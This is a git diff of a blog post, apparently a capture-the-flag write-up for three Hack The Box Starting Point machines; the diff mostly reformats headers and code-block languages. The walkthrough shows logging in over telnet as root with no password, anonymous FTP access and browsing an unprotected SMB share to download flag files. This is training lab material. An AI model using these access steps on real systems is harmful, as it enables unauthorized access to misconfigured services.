--- a/_posts/ctf/htb/starting-point/2022-02-27-tier0.md
+++ b/_posts/ctf/htb/starting-point/2022-02-27-tier0.md
@@ -4,33 +4,35 @@ title: 'HTB | Tier 0'
 permalink: /htb/starting-point/tier-0/
 ---
 
-# [](#header-4)Meow
-## [](#header-4)Connection
+# Meow
+## Connection
 We just need to connect with telnet. The user will be root, with no password.
-{% highlight plain %}
+{% highlight bash %}
 > telnet 10.129.53.229
 > Meow login: root
 {% endhighlight %}
 
-## [](#header-4)Flag
+## Flag
 Then we will have the flag just there.
-{% highlight plain %}
+{% highlight bash %}
 > ls
 > cat flag.txt
 {% endhighlight %}
 
-# [](#header-4)Fawn
-## [](#header-4)Connection
+---
+
+# Fawn
+## Connection
 In this case we need to make a connection with ftp. We will use the **anonymous** user to connect, with no password.
-{% highlight plain %}
+{% highlight bash %}
 > ftp 10.129.1.14
 Name (10.129.1.14:kali): anonymous
 Password:
 {% endhighlight %}
 
-## [](#header-4)Flag
+## Flag
 With **get**, we can download the file.
-{% highlight plain %}
+{% highlight bash %}
 ftp> ls
 ftp> get flag.txt
 ftp> exit
@@ -38,11 +40,12 @@ ftp> exit
 > cat flag.txt
 {% endhighlight %}
 
+---
 
-# [](#header-4)Dancing
-## [](#header-4)Connection
+# Dancing
+## Connection
 We will need to use samba to connect. With the option **-L** we can see all the folders we have. We can see that the last one doesn't have protection.
-{% highlight plain %}
+{% highlight batch %}
 > smbclient -L //10.129.119.218/
         Sharename       Type      Comment
         ---------       ----      -------
@@ -53,9 +56,9 @@ We will need to use samba to connect. With the option **-L** we can see all the 
 > smbclient //10.129.119.218/WorkShares
 {% endhighlight %}
 
-## [](#header-4)Flag
+## Flag
 With the command **get** we can download the file.
-{% highlight plain %}
+{% highlight batch %}
 smb: \> ls
 smb: \> cd James.P\
 smb: \James.P\> ls
